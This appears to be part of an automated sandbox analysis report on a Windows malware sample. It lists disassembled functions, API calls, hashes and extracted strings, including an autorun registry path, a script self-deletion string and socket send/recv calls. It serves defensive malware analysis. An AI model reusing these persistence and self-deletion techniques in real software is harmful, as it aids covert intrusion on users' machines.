                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: File$Delete$Close$ChangeCurrentFindHandleModuleNameNotificationProcessSleepsend
                                          • String ID: /stext "
                                          • API String ID: 3873159820-3856184850
                                          • Opcode ID: 1adbc206513e4397bd93f4418bf1d54351f2b848565a73fa930f9a925a0b31c1
                                          • Instruction ID: c6d11188fe555bf6b2f514a85e60615a11b65789dd85123b9d7458d5680bae53
                                          • Opcode Fuzzy Hash: 1adbc206513e4397bd93f4418bf1d54351f2b848565a73fa930f9a925a0b31c1
                                          • Instruction Fuzzy Hash: DDD15C319102595BCB19FB61DC91AEDB375AF54308F4041BFA40AB71E2EF785E89CE48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00417947, Relevance: 7.6, APIs: 5, Instructions: 69fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179A2
                                          • CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179AE
                                          • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179C0
                                          • CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179CD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreatePointerWrite
                                          • String ID:
                                          • API String ID: 1852769593-0
                                          • Opcode ID: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
                                          • Instruction ID: 60abe95f3f53f8d2d0590be13cf87a5088bcec8eb26bc593558798ef6058d585
                                          • Opcode Fuzzy Hash: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
                                          • Instruction Fuzzy Hash: 8F11E0B1214118BFFB104F649C89EFB777CEB063B2F104266F915D6280C6749E888A68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404CAB, Relevance: 6.1, APIs: 4, Instructions: 128synchronizationthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,0046C334), ref: 00404D98
                                          • CreateThread.KERNELBASE(00000000,00000000,?,0046C2E8,00000000,00000000), ref: 00404DAB
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00404C44,00000000,00000098,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404DB6
                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00404C44,00000000,00000098,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404DBF
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 2579639479-0
                                          • Opcode ID: 9d91b7f64c6e39e5a9e8b04c3701a8bcca088cf2191b23a238279e5d499c65d8
                                          • Instruction ID: 953b0e9f26d888488a0b13dcb1c7857754b01e04207d428095d89ba0379a6afb
                                          • Opcode Fuzzy Hash: 9d91b7f64c6e39e5a9e8b04c3701a8bcca088cf2191b23a238279e5d499c65d8
                                          • Instruction Fuzzy Hash: 034171B1900219AFCB10EBA5CC559FEBBBDAF44314F04016EF952B32D1DB38A9458B64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004179DC, Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                                          • GetFileSize.KERNEL32(00000000,00000000,00000000,?,004136FE), ref: 00417A0D
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,004136FE,00000000,00000000,00000000,?,004136FE), ref: 00417A32
                                          • FindCloseChangeNotification.KERNELBASE(00000000,004136FE), ref: 00417A40
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: File$ChangeCloseCreateFindNotificationReadSize
                                          • String ID:
                                          • API String ID: 2135649906-0
                                          • Opcode ID: 42e664b68ac7724ba780c5c00098682f8beb43ab86657588be60b934e4d9d7db
                                          • Instruction ID: 7ac9442b92b71a3b95e557c57f242bac25566de69d818a97a3fadf0226cee174
                                          • Opcode Fuzzy Hash: 42e664b68ac7724ba780c5c00098682f8beb43ab86657588be60b934e4d9d7db
                                          • Instruction Fuzzy Hash: 1801D670541218BFE7105F61AC89EFF777CDB45396F1001AAF805A3281D6748F019674
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404A08, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • connect.WS2_32(?,?,00000010), ref: 00404A23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: connect
                                          • String ID: TLS Authentication failed$[ERROR]
                                          • API String ID: 1959786783-1964023390
                                          • Opcode ID: 180a3eec618aef65dfdf02a0dca60cfd7839a15393646ce557064cfd6efdf8ed
                                          • Instruction ID: 6a9958cf6c54f084319c11af7f7712e0ea3c55cf2f2f254842a4d7e8f6879e1c
                                          • Opcode Fuzzy Hash: 180a3eec618aef65dfdf02a0dca60cfd7839a15393646ce557064cfd6efdf8ed
                                          • Instruction Fuzzy Hash: 9C014C7138020197DF08BF6589C65673B599F81344B04402BEE059F2C7EA7ADC44CB6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410D5C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,0046C500,80000002,?,0040AE30,00000000,?,0046C518,0046C500), ref: 00410D6A
                                          • RegDeleteValueW.KERNELBASE(0046C500,0046C518,?,0040AE30,00000000,?,0046C518,0046C500), ref: 00410D7E
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00410D68
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteOpenValue
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                          • API String ID: 2654517830-1051519024
                                          • Opcode ID: 4fad1368e3560850efc42bff900c7ba9b40029ea3229a6a7c2dc80faaaf5e034
                                          • Instruction ID: 75ebaf3219d9d67017fe3971026eac3f4578a9a4a068ccc2e26b180b3f179870
                                          • Opcode Fuzzy Hash: 4fad1368e3560850efc42bff900c7ba9b40029ea3229a6a7c2dc80faaaf5e034
                                          • Instruction Fuzzy Hash: D1E0C231284308BBEF104FB1EC07FFA772CEB01F42F1002A5B90692091C666DB549664
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041432B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE( _@,00000004,00405F20,?,00000000,00000000), ref: 00414341
                                          • CloseHandle.KERNEL32(?), ref: 0041434A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Close$ChangeFindHandleNotification
                                          • String ID: _@
                                          • API String ID: 4069496961-2364776441
                                          • Opcode ID: 58aded64bf1e59f1414464173308a418173fcc3aae8707c786a46d3112efcba5
                                          • Instruction ID: 593f2f721d058f847ab3d215af488efc5a805750498aadbe0de6bb03fde21c1b
                                          • Opcode Fuzzy Hash: 58aded64bf1e59f1414464173308a418173fcc3aae8707c786a46d3112efcba5
                                          • Instruction Fuzzy Hash: 7FD05E35C4221C7F8F007FA4AC0A8ADB77CFA09202B540596F828822129A7699548A64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410A30, Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                                          • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                                          • RegCloseKey.KERNELBASE(00000000), ref: 00410A70
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: c6bf9776d3f6db4a4e763afb8c0664460806c1accb4e7b0a446a59c5926fe9c4
                                          • Instruction ID: 441e9820231bba63bf934a94159cc2a1568a4eaa66ed414e7fe82764e71c2100
                                          • Opcode Fuzzy Hash: c6bf9776d3f6db4a4e763afb8c0664460806c1accb4e7b0a446a59c5926fe9c4
                                          • Instruction Fuzzy Hash: E5014B3180022DFBCF219FA1DC49DEB7F38EF157A1F004165BA08621A1D6759AA5DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410AA7, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410AB6
                                          • RegSetValueExA.KERNELBASE(?,00460614,00000000,?,00000000,00000000,0046C518,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410ADE
                                          • RegCloseKey.ADVAPI32(?,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410AE9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID:
                                          • API String ID: 1818849710-0
                                          • Opcode ID: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
                                          • Instruction ID: e89491bdbf644e4e0ba0d344bde8c25a895909b1be654527de0f828c9f06b44b
                                          • Opcode Fuzzy Hash: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
                                          • Instruction Fuzzy Hash: 7FF0C232040208BFCB00AFA0DC05DEE3B6CEF04B91F104226BD05A61A1EB759F10DA94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044765D, Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 00447661
                                          • _free.LIBCMT ref: 0044769A
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004476A1
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: EnvironmentStrings$Free_free
                                          • String ID:
                                          • API String ID: 2716640707-0
                                          • Opcode ID: 27d41aaa42e1a61686c2f6423c82f47d9fa0cff0111fc9c4d1ec0e2f68d4e86f
                                          • Instruction ID: 4b3672921d85d94027c856c8d4557e31c130c3ea1869d6c91df0e3c849bae827
                                          • Opcode Fuzzy Hash: 27d41aaa42e1a61686c2f6423c82f47d9fa0cff0111fc9c4d1ec0e2f68d4e86f
                                          • Instruction Fuzzy Hash: 8AE0E537149A112AE222223A6C49E7B3619CFC67BA716002BF10886142DF288D0305AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004108E2, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,00000000,00000000), ref: 00410904
                                          • RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000400), ref: 00410923
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0041092C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
                                          • Instruction ID: 3e5bbf023fc67ff476987f8fad8e364188ed9517bf6302b110b94af4ea8623b3
                                          • Opcode Fuzzy Hash: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
                                          • Instruction Fuzzy Hash: 66F0AFB5600308BBDB109F90DD05FED777C9B04B02F1000A6BB04B6191D6B4AB459BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410885, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
                                          • RegCloseKey.KERNELBASE(?), ref: 004108CE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
                                          • Instruction ID: 52561c361bf01b8e86e1a5ce9e630969f3828b93d2dbd7bb4aa450e57b23c49a
                                          • Opcode Fuzzy Hash: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
                                          • Instruction Fuzzy Hash: A3F01D7690030CBFDF10AFA09C05FEEBBBCEB04B52F1041A5FA04E6195D2759B549B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00416ED0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalMemoryStatusEx.KERNELBASE(?,00000001), ref: 00416EE4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: @
                                          • API String ID: 1890195054-2766056989
                                          • Opcode ID: ce4d863d7768f255fddeabf47dc1dbfb58c639174398680716ba09d3759aad2e
                                          • Instruction ID: 6e419d6119f7d5a92ba7ea5aa2db3d9dcc0ca085608ff36f3d6b7b397ab9513c
                                          • Opcode Fuzzy Hash: ce4d863d7768f255fddeabf47dc1dbfb58c639174398680716ba09d3759aad2e
                                          • Instruction Fuzzy Hash: 3ED017B580231C9FC720EFA8E804A8DBBFCFB08210F00056AEC49E3300E770A8108B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043F9DA, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 0043F9FB
                                            • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          • RtlReAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000001,?,0040F572,?,?,?,0040F89B), ref: 0043FA37
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap$_free
                                          • String ID:
                                          • API String ID: 1482568997-0
                                          • Opcode ID: 3fd55c2b2b7978b2ef2c309c440481198a224f68a4a4198c91793756be5614a2
                                          • Instruction ID: 409074293b3810aa7ddd1280863e7d0579cbe773a19cb3134e1aa8b6ea316b44
                                          • Opcode Fuzzy Hash: 3fd55c2b2b7978b2ef2c309c440481198a224f68a4a4198c91793756be5614a2
                                          • Instruction Fuzzy Hash: 08F0C832E0121275CB217A26BC00B5B27588FC9765F11613BF829A6291DE3CD80582AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401646, Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 78e0c05a8bcd0e5a2d91a04ac3c4150d1433fd0d4609d8fa5bf44bc2a10101cf
                                          • Instruction ID: 14bc11751579f6a418080d33961eb9a75802e287542bdf943e450bbe308a60cc
                                          • Opcode Fuzzy Hash: 78e0c05a8bcd0e5a2d91a04ac3c4150d1433fd0d4609d8fa5bf44bc2a10101cf
                                          • Instruction Fuzzy Hash: BCF0B4712142085BCB0C9E34AC91BBA375D5B11368BA44B7FF02EDA1E1D73BD984824C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041719C, Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Window$ForegroundText
                                          • String ID:
                                          • API String ID: 29597999-0
                                          • Opcode ID: de6f372f724c64eaa2c7ed6c2aac536a81d6c43785f51a9ef177bda7df55ad17
                                          • Instruction ID: aaff8fddf6ef76f16923c3f9de4e1078fffc563957b707b355cfa3dba45694d1
                                          • Opcode Fuzzy Hash: de6f372f724c64eaa2c7ed6c2aac536a81d6c43785f51a9ef177bda7df55ad17
                                          • Instruction Fuzzy Hash: 2ED0C231A0032867EA206BE49C4DFA5772C9704B42F0001AABD14D3182DD74990487D4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402D0D, Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 944fb353753fac14d10f0a7ff01711820957b56d157fc21c1c4a6115c61adfc2
                                          • Instruction ID: e6e99268b29485b263ac33084d07fd67f49e3475c5b5c63b65d8ccfcab0936ee
                                          • Opcode Fuzzy Hash: 944fb353753fac14d10f0a7ff01711820957b56d157fc21c1c4a6115c61adfc2
                                          • Instruction Fuzzy Hash: 1B218571B001055BCB14EFB6858A6BE77AAAF84314F10403FE415BB2C2DBBC5E019799
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404AA4, Relevance: 1.6, APIs: 1, Instructions: 65networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: a8901e1461b86aa7a85217045e2ebfb96c64ec8441432215c30d957f45cac48d
                                          • Instruction ID: b7cc105376a0c6c17fc0074abac2d673c8eb48d7e6be34cea40eb70dca5961eb
                                          • Opcode Fuzzy Hash: a8901e1461b86aa7a85217045e2ebfb96c64ec8441432215c30d957f45cac48d
                                          • Instruction Fuzzy Hash: 7E214F7190020AABC705FB51E856FEEB778AF10304F10817FA5127B1E1DF78A905CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004186D5, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004186DA
                                            • Part of subcall function 00402728: std::_Deallocate.LIBCONCRT ref: 00402B22
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeallocateH_prologstd::_
                                          • String ID:
                                          • API String ID: 3881773970-0
                                          • Opcode ID: f46027884e1413337238d50f42e13745b95dbef1ad6e3c4deee818e167e2a883
                                          • Instruction ID: 81f1575e26007701d47cce485488fb1d9f0d7f2c3705a4b1df04078d35adb080
                                          • Opcode Fuzzy Hash: f46027884e1413337238d50f42e13745b95dbef1ad6e3c4deee818e167e2a883
                                          • Instruction Fuzzy Hash: B6117F71A001149FCB15EF69C9867AEBBB6EF85314F10416FF500AB2E1DBB50901DB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00422179, Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00422251: recv.WS2_32(?,?,?,?), ref: 0042225C
                                          • WSAGetLastError.WS2_32 ref: 0042219B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastrecv
                                          • String ID:
                                          • API String ID: 2514157807-0
                                          • Opcode ID: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
                                          • Instruction ID: 5fd3ebf0e0d9901e6086a92a38d31c1d4f4930f82062b2ddb0320275891adbe9
                                          • Opcode Fuzzy Hash: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
                                          • Instruction Fuzzy Hash: B7F0A43230C1297A9F189959FE94C7933459F85374BB0436BFE3AC65F0EA6998602149
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004221EA, Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0042226A: send.WS2_32(?,?,?,?), ref: 00422275
                                          • WSAGetLastError.WS2_32 ref: 0042220C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastsend
                                          • String ID:
                                          • API String ID: 1802528911-0
                                          • Opcode ID: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
                                          • Instruction ID: 207b8048d6da47c8d3e1bf0cf2b23625c58979fe3f9e08f58dd8cb8bfe01de6d
                                          • Opcode Fuzzy Hash: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
                                          • Instruction Fuzzy Hash: 19F0BB3530C534FADF18995CFE548393341AF45330B70439BF939866F0DA6E5850917A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043F98C, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
                                          • Instruction ID: 400f104e77b540acbfcd3781324d28ce3e91d9a3d9d75f8370708e8767061156
                                          • Opcode Fuzzy Hash: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
                                          • Instruction Fuzzy Hash: 01E02BB290022177DB2126625C0075B36489F5D7B1F103037FD05922C0DB6CCC0582EE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040498B, Relevance: 1.5, APIs: 1, Instructions: 30networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WS2_32(00000000,00000001,00000006), ref: 004049AC
                                            • Part of subcall function 004049DE: WSAStartup.WS2_32(00000202,00000000), ref: 004049F3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Startupsocket
                                          • String ID:
                                          • API String ID: 3996037109-0
                                          • Opcode ID: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
                                          • Instruction ID: 643c1d6dd67993fbe743bd4810411797e70fdf622d87f5941d6678f6439cf7cf
                                          • Opcode Fuzzy Hash: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
                                          • Instruction Fuzzy Hash: 68F0BEF10057905AE7314F344880393BFD45B52318F14897FE6D2A3BC2C2B9A819C76A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404B5A, Relevance: 1.5, APIs: 1, Instructions: 21networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • recv.WS2_32(FFFFFFFF,0046BACC,?,00000000), ref: 00404B82
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: recv
                                          • String ID:
                                          • API String ID: 1507349165-0
                                          • Opcode ID: f51da9c7f7a354ed60f7591d544108ff1c1d334abc874874dee1a6f4a1b8aa5d
                                          • Instruction ID: f3ec6d8f34401422f244b447c80db10cf3c514e603278a65c5bd388ab48e0435
                                          • Opcode Fuzzy Hash: f51da9c7f7a354ed60f7591d544108ff1c1d334abc874874dee1a6f4a1b8aa5d
                                          • Instruction Fuzzy Hash: 2DE08672048204BFDB056F40DC46FA97F29DB54765F24C11EFA08191A2DB33F552D748
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004049DE, Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004049F3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Startup
                                          • String ID:
